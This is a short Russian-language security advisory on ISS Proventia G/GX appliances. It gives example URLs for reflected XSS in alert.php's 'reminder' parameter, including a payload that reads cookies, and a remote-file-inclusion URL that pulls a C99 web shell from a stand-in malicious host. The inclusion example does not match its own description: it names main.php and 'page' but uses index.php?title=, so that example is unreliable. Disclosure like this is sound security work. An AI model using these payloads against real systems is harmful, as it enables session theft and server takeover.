Программа: ISS Proventia G/GX Series
Уязвимость позволяет удаленному пользователю выполнить PHP сценарий и произвести XSS нападение на целевую систему.
1) Уязвимость существует из-за недостаточной обработки входных данных в параметре «reminder» сценарием alert.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
Требуется аутентификация!
https://10.0.0.100/alert.php?reminder=-->//"><script>alert(/XSS%20vulnerability%20proventia%20s0x by Alex Hernandez/);</script>
https://10.0.0.100/alert.php?reminder=-->//"><script>alert(document.cookie)</script>
https://10.0.0.100/alert.php?reminder=-->//"><script>alert(document.domain)</script>
2) Уязвимость существует из-за недостаточной обработки входных данных в параметре «page» сценарием main.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
www.vulnerable.website.com/index.php?title= http://www.malicious.code.com/C99.php?archive.php
